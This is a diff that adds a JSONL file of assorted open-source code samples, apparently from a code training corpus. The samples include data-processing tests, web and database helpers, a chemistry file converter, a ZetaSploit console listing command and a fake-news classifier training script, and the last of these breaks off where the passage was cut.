diff --git "a/2870.jsonl" "b/2870.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2870.jsonl"
@@ -0,0 +1,750 @@
+{"seq_id":"109641719","text":"from pandas.testing import assert_frame_equal\n\nfrom tests.integration.fixtures import DaskTestCase\n\n\nclass FilterTestCase(DaskTestCase):\n def test_filter(self):\n df = self.c.sql(\"SELECT * FROM df WHERE a < 2\")\n df = df.compute()\n\n expected_df = self.df[self.df[\"a\"] < 2]\n assert_frame_equal(df, expected_df)\n\n def test_filter_complicated(self):\n df = self.c.sql(\"SELECT * FROM df WHERE a < 3 AND (b > 1 AND b < 3)\")\n df = df.compute()\n\n expected_df = self.df[\n ((self.df[\"a\"] < 3) & ((self.df[\"b\"] > 1) & (self.df[\"b\"] < 3)))\n ]\n assert_frame_equal(\n df, expected_df,\n )\n","sub_path":"tests/integration/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215788712","text":"#!/usr/bin/env python3\n\n#\n# MIT License\n#\n# Copyright (c) 2020-2021 EntySec\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport os\n\nfrom core.badges import badges\nfrom core.storage import storage\nfrom core.modules import modules\nfrom core.formatter import formatter\n\nclass ZetaSploitCommand:\n def __init__(self):\n self.badges = badges()\n self.storage = storage()\n self.modules = modules()\n self.formatter = formatter()\n\n self.details = {\n 'Category': \"core\",\n 'Name': \"show\",\n 'Description': \"Show specified information.\",\n 'Usage': \"show \",\n 'ArgsCount': 1,\n 'NeedsArgs': True,\n 'Args': list()\n }\n\n def show_plugins(self):\n plugins = self.storage.get(\"plugins\")\n plugins_data = list()\n number = 0\n headers = (\"Number\", \"Name\", \"Database\", \"Description\")\n for database in plugins.keys():\n plugins = plugins[database]\n for plugin in sorted(plugins.keys()):\n plugins_data.append((number, plugin, database, plugins[plugin]['Description']))\n number += 1\n self.badges.output_empty(\"\")\n self.formatter.format_table(\"Plugins\", headers, *plugins_data)\n self.badges.output_empty(\"\")\n \n def show_modules(self, information):\n modules = self.storage.get(\"modules\")\n modules_data = list()\n number = 0\n headers = (\"Number\", \"Name\", \"Database\", \"Risk\", \"Description\")\n for database in modules.keys():\n modules = modules[database][information]\n for platform in sorted(modules.keys()):\n for module in sorted(modules[platform].keys()):\n full_name = self.modules.get_full_name(information, platform, module)\n modules_data.append((number, full_name, database, modules[platform][module]['Risk'], modules[platform][module]['Description']))\n number += 1\n self.badges.output_empty(\"\")\n self.formatter.format_table(information.title() + \" Modules\", headers, *modules_data)\n self.badges.output_empty(\"\")\n \n def show_options(self):\n current_module = self.modules.get_current_module_object()\n options_data = list()\n headers = (\"Option\", \"Value\", \"Required\", \"Description\")\n options = current_module.options\n for option in sorted(options.keys()):\n value, required = options[option]['Value'], options[option]['Required']\n if required:\n required = \"yes\"\n else:\n required = \"no\"\n if not value and value != 0:\n value = \"\"\n options_data.append((option, value, required, options[option]['Description']))\n self.badges.output_empty(\"\")\n self.formatter.format_table(\"Module Options\", 
headers, *options_data)\n self.badges.output_empty(\"\")\n \n def print_usage(self, informations, plugins, options):\n if informations or plugins or options:\n usage = \"Informations: \"\n for information in informations:\n usage += information + \", \"\n if plugins:\n usage += \"plugins, \"\n if options:\n usage += \"options\"\n else:\n usage = usage[:-2]\n self.badges.output_information(usage)\n else:\n self.badges.output_warning(\"No informations available!\")\n \n def run(self):\n information = self.details['Args'][0]\n \n if self.modules.check_current_module():\n current_module = self.modules.get_current_module_object()\n \n options = False\n if hasattr(current_module, \"options\"):\n options = True\n else:\n options = False\n \n modules = self.storage.get(\"modules\")\n plugins = self.storage.get(\"plugins\")\n \n informations = list()\n if modules:\n for database in sorted(modules.keys()):\n for category in sorted(modules[database].keys()):\n informations.append(category)\n \n if plugins:\n if information == \"plugins\":\n self.show_plugins()\n return\n if options:\n if information == \"options\":\n self.show_options()\n return\n if information in informations:\n self.show_modules(information)\n else:\n self.print_usage(informations, plugins, options)\n","sub_path":"core/commands/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"533724116","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"GEMR2D\")\n\nprocess.load(\"EventFilter.GEMRawToDigi.GEMSQLiteCabling_cfi\")\nprocess.GEMCabling.connect = 'sqlite_file:GEMEMap.db'\nprocess.load(\"EventFilter.GEMRawToDigi.gemUnpacker_cfi\")\nprocess.gemunpacker.InputLabel = cms.InputTag(\"TBData\",\"GEMTBData\")\n\n\n# set maxevents; -1 -> take all\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1))\n\nprocess.source = cms.Source (\"PoolSource\",fileNames = cms.untracked.vstring( 'file:myOutputFile.root'))\n#process.source = cms.Source (\"NewEventStreamFileReader\",fileNames = cms.untracked.vstring( 'file:myOutputFile.root'))\n\n\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n debugModules = cms.untracked.vstring('gemunpacker'),\n destinations = cms.untracked.vstring('cout'),\n cout = cms.untracked.PSet( threshold = cms.untracked.string('WARNING'))\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('file:outPut.root'),\n outputCommands = cms.untracked.vstring(\"keep *\")\n)\n\nprocess.p = cms.Path(process.gemunpacker)\nprocess.ep = cms.EndPath(process.out)\n","sub_path":"EventFilter/GEMRawToDigi/GEMRawToDigi/test/r2d.py","file_name":"r2d.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"213077159","text":"from datetime import timedelta, datetime\nfrom operator import itemgetter\nfrom typing import Iterator, Any, List, Optional, Dict, Tuple\n\nimport pymongo\nfrom dataclasses import dataclass\n\nfrom game.core.localizer import localize as _\nfrom game.data import action_constraints\nfrom game.database import db\nfrom game.entities import Entity\nfrom game.player import Player\nfrom game.repo_loli import Loli\nfrom game.time_utils import current_datetime\n\n\ndef set_cooldown(entity: Entity, reason: str, duration: timedelta, **conditions: Any):\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n db[collection].update(\n {'_id': entity.id},\n {'$push': {\n 'cooldowns': {\n 'reason': reason,\n 'expires_at': current_datetime() + duration,\n 'conditions': conditions\n }\n }}\n )\n\n\ndef remove_cooldown(entity: Entity, reason: str = None):\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n condition: Dict[str, Any] = {'expires_at': {'$gt': current_datetime()}}\n if reason:\n condition['reason'] = reason\n\n db[collection].update(\n {'_id': entity.id},\n {'$pull': {\n 'cooldowns': condition\n }}\n )\n\n\n@dataclass(frozen=True)\nclass Cooldown:\n reason: str\n expires_at: datetime\n\n\ndef get_cooldowns(entity: Entity, **conditions: Any) -> List[Cooldown]:\n if isinstance(entity, Player):\n collection = 'players'\n elif isinstance(entity, Loli):\n collection = 'loli'\n else:\n raise NotImplementedError\n\n additional_conditions = {'cooldowns.conditions.' + field: value for field, value in conditions.items()}\n cooldowns = db[collection].aggregate([\n {'$match': {'_id': entity.id}},\n {'$unwind': '$cooldowns'},\n {'$match': {'cooldowns.expires_at': {'$gt': current_datetime()}, **additional_conditions}},\n {'$sort': {'cooldowns.expires_at': pymongo.DESCENDING}},\n {'$project': {'reason': '$cooldowns.reason', 'expires_at': '$cooldowns.expires_at'}}\n ])\n\n return [Cooldown(reason=cooldown['reason'], expires_at=cooldown['expires_at']) for cooldown in cooldowns]\n\n\ndef get_active_cooldown(action: str, **params) -> Optional[str]:\n cooldowns = get_active_cooldowns(action, **params)\n earliest_cooldown = next(iter(cooldowns), None)\n if not earliest_cooldown:\n return None\n\n cooldown, end_date = earliest_cooldown\n\n return _('action.{}.fail'.format(action)) + ' ' + _('cooldown.{}.fail'.format(cooldown))\n\n\ndef get_active_cooldowns(action: str, **params) -> Iterator[Tuple[str, datetime]]:\n try:\n expected_params = action_constraints[action]['params']\n except KeyError:\n raise StopIteration\n\n active_cooldowns = {}\n for param_name in expected_params:\n entity = params.get(param_name, None)\n blocking_cooldowns = expected_params[param_name]\n if not entity and not blocking_cooldowns:\n continue\n for cooldown in get_cooldowns(entity):\n if cooldown.reason in blocking_cooldowns:\n active_cooldowns[param_name + '.' 
+ cooldown.reason] = cooldown.expires_at\n\n yield from sorted(active_cooldowns.items(), key=itemgetter(1), reverse=True)\n\n\ndef has_cooldown(entity: Entity, reason: str, **conditions: Any) -> bool:\n cooldowns = get_cooldowns(entity, **conditions)\n return any(cooldown.reason == reason for cooldown in cooldowns)\n","sub_path":"game/cooldowns.py","file_name":"cooldowns.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"599459937","text":"# from django.shortcuts import render\nfrom django.http import HttpResponse\n# from django.views.generic.base import TemplateView\nfrom django.template.response import TemplateResponse\n\ndef home(request):\n html='appointment.home'\n t = TemplateResponse(request, 'base.html', {})\n t.template_name = 'index.html'\n t.render();\n # return HttpResponse(html)\n return t\n","sub_path":"appointment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"111688704","text":"#encoding utf-8\r\n#\r\n# model.topic\r\n# by wooght 2017-11\r\n\r\nimport model.Db as T\r\n\r\ndef all():\r\n s = T.select([T.topic.c.body,T.topic.c.id]).where(T.topic.c.id>21441)\r\n r = T.conn.execute(s)\r\n return r.fetchall()\r\n\r\ndef one(id):\r\n s = T.select([T.topic.c.body,T.topic.c.id]).where(T.topic.c.id==id)\r\n r = T.conn.execute(s)\r\n r_str = r.fetchall()[0]\r\n return r_str\r\n\r\ndef up(id,arr):\r\n u = T.topic.update().where(T.topic.c.id==id).values(arr)\r\n r = T.conn.execute(u)\r\n if(r.rowcount>0):\r\n return True\r\n else:\r\n return False\r\n\r\n#查company codeid\r\ndef s_company_id(str):\r\n s = T.select([T.listed_company.c.codeid]).where(T.listed_company.c.name.like(str))\r\n r = T.conn.execute(s)\r\n result = r.fetchall()\r\n return result[0][0]\r\n\r\n#查plate plateid\r\ndef s_plate_id(str):\r\n s = T.select([T.listed_plate.c.plateid]).where(T.listed_plate.c.name.like(str))\r\n r = T.conn.execute(s)\r\n result = r.fetchone()\r\n return result[0]\r\n","sub_path":"caijing_scrapy/model/topic.py","file_name":"topic.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"145624984","text":"def is_letter(a):\n a = str(a)\n a = ord(a)\n a = bool(64 < a < 91 or 96 < a < 123)\n return a\n\n\ndef roteer_letter(a, b):\n a = ord(a)\n if a < 91:\n x = 1\n else:\n x = 0\n if (a + b > 90 and x == 1) or a + b > 122:\n a -= 26 * ((b // 26.0001) + 1)\n return chr(int(a + b))\n\n\ndef versleutel(a, b):\n c = ''\n for i in a:\n if is_letter(i):\n c += roteer_letter(i, b)\n else:\n c += i\n return c\n","sub_path":"08 - Functies/Ave Caesar.py","file_name":"Ave Caesar.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"568055320","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\n\ntime1 = time.time()\n\n#basic crawling function\ndef crawling(link):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n r = requests.get(link, headers=headers, timeout=20)\n html_data = BeautifulSoup(r.text, 'lxml')\n return html_data\n except Exception as e:\n print('该地址下载失败: ', url)\n print(e)\nfor i in range(1,10):\n main_site_links='https://keikolynn.com/category/style/shopping-guides/page/'+str(i)+'/'\n main_site_data = crawling(main_site_links)\n print(main_site_data)\n","sub_path":"keikolynn.py","file_name":"keikolynn.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"166730018","text":"# Converts ligand SMILES strings into PDB files\n# reads from smiles.csv and outputs to the ligand_pdb directory.\n\nimport csv\nimport mechanize\nimport os\nfrom pyquery import PyQuery\nimport ssl\nimport urllib.request\n\nHTML_SUCCESS = 200\nURL_TEMPLATE = \"http://cactus.nci.nih.gov{}\"\nFILE_TEMPLATE = \"{}/{}.pdb\"\nURL = URL_TEMPLATE.format('/translate')\nOUTDIR = 'ligand_pdb'\nDATA_FILE = 'data.txt'\n\nssl._create_default_https_context = ssl._create_unverified_context\nbr = mechanize.Browser()\nbr.set_handle_robots(False)\n\nif not os.path.exists(OUTDIR):\n os.makedirs(OUTDIR)\n\nwith open(DATA_FILE, 'r', encoding='utf-8') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t')\n rows = list(reader)[1:]\n data = set(( (row[1], row[2]) for row in rows ))\n progress = 0\n for common, smiles in data:\n progress += 1\n print(\"Converting compound {}/{}: {}\".format(progress, len(data), common))\n print(' Opening connection')\n br.open(URL)\n br.select_form(name='form')\n br['smiles'] = smiles\n br['format'] = ['pdb']\n br['astyle'] = ['aromatic']\n br['dim'] = ['3D']\n print(' Submitting form')\n res = br.submit()\n if res.getcode() == HTML_SUCCESS:\n print(' Downloading PDB file')\n content = res.read()\n pq = PyQuery(content)\n link = pq('a:first').attr('href')\n file_url = URL_TEMPLATE.format(link)\n filename = FILE_TEMPLATE.format(OUTDIR, common)\n urllib.request.urlretrieve(file_url, filename)\n print(\" Success! File saved to {}\".format(filename))\n else:\n print(\" Invalid form response: {}\".format(res.getcode()))\n print()\n","sub_path":"Preprocessing Scripts/ligand_smiles_to_pdb.py","file_name":"ligand_smiles_to_pdb.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"398776416","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-intel/egg/doubanfm/controller/lrc_controller.py\n# Compiled at: 2016-06-22 17:23:26\nimport logging\nfrom doubanfm.views import lrc_view\nfrom doubanfm.controller.main_controller import MainController\nlogger = logging.getLogger('doubanfm')\n\nclass LrcController(MainController):\n \"\"\"\n 按键控制\n \"\"\"\n\n def __init__(self, player, data, queue):\n self.player = player\n self.data = data\n self.keys = data.keys\n self.quit = False\n self.rate_times = 0\n self.queue = queue\n self._bind_view()\n\n def _bind_view(self):\n self.view = lrc_view.Lrc(self.data)\n\n def _watchdog_queue(self):\n u\"\"\"\n 从queue里取出字符执行命令\n \"\"\"\n while not self.quit:\n k = self.queue.get()\n if k == self.keys['QUIT']:\n self.quit = True\n self.switch_queue.put('main')\n elif k == self.keys['BYE']:\n self.data.bye()\n self.player.start_queue(self)\n elif k == self.keys['LOOP']:\n self.set_loop()\n elif k == self.keys['RATE']:\n self.set_rate()\n elif k == self.keys['OPENURL']:\n self.set_url()\n elif k == self.keys['HIGH']:\n self.set_high()\n elif k == self.keys['PAUSE']:\n self.set_pause()\n elif k == self.keys['NEXT']:\n self.player.next()\n elif k == '-' or k == '_':\n self.set_volume(-1)\n elif k == '+' or k == '=':\n self.set_volume(1)\n elif k == self.keys['MUTE']:\n self.set_mute()\n elif k in ('1', '2', '3', '4'):\n self.set_theme(k)\n elif k == self.keys['UP'] or k == 'B':\n self.up()\n elif k == self.keys['DOWN'] or k == 'A':\n self.down()","sub_path":"pycfiles/douban.fm-0.4.15-py2.7/lrc_controller.py","file_name":"lrc_controller.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"93294209","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass ModifyQuotaDetails(object):\n\n def __init__(self):\n self._quota_amount = None\n self._quota_dimension = None\n self._role = None\n\n @property\n def quota_amount(self):\n return self._quota_amount\n\n @quota_amount.setter\n def quota_amount(self, value):\n self._quota_amount = value\n @property\n def quota_dimension(self):\n return self._quota_dimension\n\n @quota_dimension.setter\n def quota_dimension(self, value):\n self._quota_dimension = value\n @property\n def role(self):\n return self._role\n\n @role.setter\n def role(self, value):\n self._role = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.quota_amount:\n if hasattr(self.quota_amount, 'to_alipay_dict'):\n params['quota_amount'] = self.quota_amount.to_alipay_dict()\n else:\n params['quota_amount'] = self.quota_amount\n if self.quota_dimension:\n if hasattr(self.quota_dimension, 'to_alipay_dict'):\n params['quota_dimension'] = self.quota_dimension.to_alipay_dict()\n else:\n params['quota_dimension'] = self.quota_dimension\n if self.role:\n if hasattr(self.role, 'to_alipay_dict'):\n params['role'] = self.role.to_alipay_dict()\n else:\n params['role'] = self.role\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = ModifyQuotaDetails()\n if 'quota_amount' in d:\n o.quota_amount = d['quota_amount']\n if 'quota_dimension' in d:\n o.quota_dimension = d['quota_dimension']\n if 'role' in d:\n o.role = d['role']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/ModifyQuotaDetails.py","file_name":"ModifyQuotaDetails.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"84317283","text":"#Utils\nimport numpy as np\n\nclass DotDict(dict):\n # dot.notation access to dictionary attributes\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n\ndef print_data(name, data, boolean=False):\n if boolean is True:\n np.savetxt(name, data, fmt=\"%1d\", delimiter=\" \")\n else:\n np.savetxt(name, data, fmt=\"%9.2e\", delimiter=\" \")\n\ndef cmap_to_cscale(cmap, pl_entries):\n h = 1.0/(pl_entries-1)\n pl_colorscale = []\n\n for k in range(pl_entries):\n C = list(map(np.uint8, np.array(cmap(k*h)[:3])*255))\n pl_colorscale.append([k*h, 'rgb'+str((C[0], C[1], C[2]))])\n\n return pl_colorscale\n\nclass MagicMethodWrapper(type):\n\n def __init__(cls, name, bases, dct):\n def make_proxy(name):\n def proxy(self, *args):\n return getattr(self._obj, name)\n return proxy\n type.__init__(cls, name, bases, dct)\n if cls.__wraps__:\n ignore = set(\"__%s__\" % n for n in cls.__ignore__.split())\n for name in dir(cls.__wraps__):\n if name.startswith(\"__\"):\n if name not in ignore and name not in dct:\n #attr = getattr(cls.__wraps__, name)\n setattr(cls, name, property(make_proxy(name)))\n\n\nclass Wrapper(object, metaclass = MagicMethodWrapper):\n\n __wraps__ = None\n __ignore__ = \"class mro new init setattr getattr getattribute dir\"\n\n def __init__(self, obj):\n if self.__wraps__ is None:\n raise TypeError(\"base class Wrapper may not be instansiated\")\n elif isinstance(obj, self.__wraps__):\n self._obj = obj\n else:\n raise ValueError(\"wrapped object must be of {}\".format(self.__wraps__))\n\n def __getattr__(self, name):\n return getattr(self._obj, name)\n\n\"\"\"\n# class Wrapper use\nfrom utils import Wrapper\nimport numpy as np\n\nclass ArrayWrapper(Wrapper):\n __wraps__ = np.ndarray\n def salute(self):\n print('hola')\n\nnumpy_array = np.random.rand(5,6)\nwa = ArrayWrapper(numpy_array)\n\"\"\"\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"569279628","text":"\nimport marshal\nimport os\nimport time\nimport ZEO.zrpc.connection\n\n\nbase = '/tmp'\n\npath = None\n\ndef log(connection, action=None):\n \"\"\"Enable, disable, or get the path of the zeo input log\n \"\"\"\n global path\n\n if action is None:\n connection.write(path and (\"%r\\n\" % path) or 'disabled')\n return\n\n if action == 'disable':\n if path is None:\n connection.write(\"Already disabled\\n\")\n else:\n connection.write(\"disabled %r\\n\" % path)\n del ZEO.zrpc.connection.ManagedServerConnection.message_input\n path = None\n return\n\n if action != 'enable':\n connection.write(\"Unknown action: %r\\n\" % action)\n\n if path:\n log(connection, 'disable')\n\n _path = os.path.join(base, time.strftime(\"%y%m%d%H%M%S\",\n time.gmtime(time.time())))\n\n log_file = open(_path, 'w')\n path = _path\n base_message_input = ZEO.zrpc.connection.Connection.message_input\n dump = marshal.dump\n timetime = time.time\n\n def message_input(self, message):\n dump((id(self), timetime(), message), log_file)\n base_message_input(self, message)\n\n ZEO.zrpc.connection.ManagedServerConnection.message_input = message_input\n connection.write(\"enabled %r\\n\" % path)\n","sub_path":"zc.zeoinputlog/branches/replay/src/zc/zeoinputlog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"521478900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: rahulmishra\n\"\"\"\nimport os, time, pickle\nimport numpy as np\nimport tensorflow as tf\nimport datetime\nfrom data_helpers import Dataset\nimport data_helpers\nfrom model import SADHA\n\nimport argparse\n#from tensorflow import reset_default_graph\nargs = argparse.ArgumentParser()\n\nconfig, unparsed = args.parse_known_args()\n\n\n\n\n#reset_default_graph()\n# Data loading params\nargs.add_argument(\"n_class\", type=int, default=2)\nargs.add_argument(\"-dataset\", default='politi')\n# Model Hyperparameters\nargs.add_argument(\"embedding_dim\", type=int, default=100)\nargs.add_argument(\"hidden_size\", type=int, default=100)\nargs.add_argument('max_sen_len',type=int, default=500)\nargs.add_argument('max_doc_len',type=int,default= 40)\nargs.add_argument(\"lr\",type=float, default=0.001)\n\n# Training parameters\nargs.add_argument(\"batch_size\",type=int, default=100)\nargs.add_argument(\"num_epochs\", type=int,default=10)\nargs.add_argument(\"evaluate_every\",type=int, default=50)\n\n# Misc Parameters\nargs.add_argument(\"allow_soft_placement\",type= bool,default= True)\nargs.add_argument(\"log_device_placement\",type= bool, default=False)\n\nconfig1, unparsed = args.parse_known_args()#import sys\n#FLAGS(sys.argv)\n#FLAGS._parse_flags()\nprint(\"\\nParameters:\")\n#for attr, value in sorted(FLAGS.__flags.items()):\n# print(\"{}={}\".format(attr.upper(), value))\n#print(\"\")\n\n\n# Load data\nprint(\"Loading data...\")\n\n\ndata_dir = \"/home/prosjekt/deepnews/fakenews-data/snopes_pickles/\"\nwith open(data_dir+'docVectorCollection.pickle', 'rb') as handle:\n doc_data = pickle.load(handle)\nwith open(data_dir+'labelVectorCollection.pickle', 'rb') as handle:\n label_data = pickle.load(handle)\nwith open(data_dir+'claimVectorCollection.pickle', 'rb') as handle:\n claim_data = pickle.load(handle)\nwith open(data_dir+'SpeakerVectorCollection.pickle', 'rb') as handle:\n speaker_data = pickle.load(handle)\nwith open(data_dir+'DocSourceCollection.pickle', 'rb') as handle:\n source_doc_data = pickle.load(handle)\n\n\ntrain_doc = doc_data[:int((len(doc_data)+1)*.80)]\ntrain_label = label_data[:int((len(doc_data)+1)*.80)]\ntrain_claim = claim_data[:int((len(doc_data)+1)*.80)]\ntrain_speaker = speaker_data[:int((len(doc_data)+1)*.80)]\ntrain_source_doc = source_doc_data[:int((len(doc_data)+1)*.80)]\n\ntest_doc = doc_data[int(len(train_doc)*.80+1):]\ntest_label = label_data[int(len(train_doc)*.80+1):]\ntest_claim = claim_data[int(len(train_doc)*.80+1):]\ntest_speaker = speaker_data[int(len(train_doc)*.80+1):]\ntest_source_doc = source_doc_data[int(len(train_doc)*.80+1):]\n\n\nFtrain_doc = train_doc[:int((len(train_doc)+1)*.80)]\nFtrain_label = train_label[:int((len(train_doc)+1)*.80)]\nFtrain_claim = train_claim[:int((len(train_doc)+1)*.80)]\nFtrain_speaker = train_speaker[:int((len(train_doc)+1)*.80)]\nFtrain_source_doc = train_source_doc[:int((len(train_doc)+1)*.80)]\n\nval_doc = train_doc[int(len(train_doc)*.80+1):]\nval_label = train_label[int(len(train_doc)*.80+1):]\nval_claim = train_claim[int(len(train_doc)*.80+1):]\nval_speaker = train_speaker[int(len(train_doc)*.80+1):]\nval_source_doc = train_source_doc[int(len(train_doc)*.80+1):]\n\n#print(val_doc,val_label,val_claim,val_speaker,val_source_doc)\nall_d = Dataset(doc_data,label_data,claim_data,speaker_data,source_doc_data)\ntrainset = Dataset(Ftrain_doc,Ftrain_label,Ftrain_claim,Ftrain_speaker,Ftrain_source_doc)\ndevset = 
Dataset(val_doc,val_label,val_claim,val_speaker,val_source_doc)\ntestset = Dataset(test_doc,test_label,test_claim,test_speaker,test_source_doc)\nprint(devset.t_label[0])\n\nalldata = np.concatenate([trainset.t_docs, devset.t_docs, testset.t_docs], axis=0)\n#print(alldata)\nembeddingpath = '/home/prosjekt/deepnews/falseclaims-data/clean_data/glove.6B.100d.txt'\nembeddingfile, wordsdict = data_helpers.load_embedding(embeddingpath, alldata, config1.embedding_dim)\n#del alldata\nprint(\"Loading data finished...\")\n\nspkrdict, domdict = all_d.get_spkr_dom_dict()\ntrainbatches = trainset.batch_iter(spkrdict, domdict, wordsdict, config1.n_class, config1.batch_size,\n config1.num_epochs, config1.max_sen_len, config1.max_doc_len)\n#spkrdict, domdict = devset.get_spkr_dom_dict()\n\ndevset.genBatch(spkrdict, domdict, wordsdict, config1.batch_size,\n config1.max_sen_len, config1.max_doc_len, config1.n_class)\n#spkrdict, domdict = testset.get_spkr_dom_dict()\n\ntestset.genBatch(spkrdict, domdict, wordsdict, config1.batch_size,\n config1.max_sen_len, config1.max_doc_len, config1.n_class)\n\n\n#devbatches = devset.batch_iter(spkrdict, domdict, wordsdict, FLAGS.n_class, FLAGS.batch_size,\n# FLAGS.num_epochs, FLAGS.max_sen_len, FLAGS.max_doc_len)\n#testbatches = testset.batch_iter(spkrdict, domdict, wordsdict, FLAGS.n_class, FLAGS.batch_size,\n# FLAGS.num_epochs, FLAGS.max_sen_len, FLAGS.max_doc_len)\n\nwith tf.Graph().as_default():\n session_config = tf.ConfigProto(\n \n allow_soft_placement=config1.allow_soft_placement,\n log_device_placement=config1.log_device_placement\n )\n session_config.gpu_options.allow_growth = True\n session_config.gpu_options.allocator_type = 'BFC'\n\n# config = tf.ConfigProto(device_count = {'GPU': 1})\n sess = tf.Session(config=session_config)\n with sess.as_default():\n SADHA = SADHA(\n max_sen_len = config1.max_sen_len,\n max_doc_len = config1.max_doc_len,\n class_num = config1.n_class,\n embedding_file = embeddingfile,\n embedding_dim = config1.embedding_dim,\n hidden_size = config1.hidden_size,\n spkr_num = len(spkrdict),\n dom_num = len(domdict)\n )\n SADHA.build_model()\n # Define Training procedure\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n optimizer = tf.train.AdamOptimizer(config1.lr)\n grads_and_vars = optimizer.compute_gradients(SADHA.loss)\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)\n\n # Save dict\n timestamp = str(int(time.time()))\n checkpoint_dir = os.path.abspath(\"../checkpoints/\"+config1.dataset+\"/\"+timestamp)\n checkpoint_prefix = os.path.join(checkpoint_dir, \"model\")\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)\n with open(checkpoint_dir + \"/wordsdict.txt\", 'wb') as f:\n pickle.dump(wordsdict, f)\n with open(checkpoint_dir + \"/spkrdict.txt\", 'wb') as f:\n pickle.dump(spkrdict, f)\n with open(checkpoint_dir + \"/domdict.txt\", 'wb') as f:\n pickle.dump(domdict, f)\n\n sess.run(tf.global_variables_initializer())\n\n def train_step(batch):\n u, p, x, y, sen_len, doc_len = zip(*batch)\n feed_dict = {\n SADHA.spkrid: u,\n SADHA.domid: p,\n SADHA.input_x: x,\n SADHA.input_y: y,\n SADHA.sen_len: sen_len,\n SADHA.doc_len: doc_len\n }\n _, step, loss, accuracy = sess.run(\n [train_op, global_step, SADHA.loss, SADHA.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n\n def predict_step(u, p, x, y, 
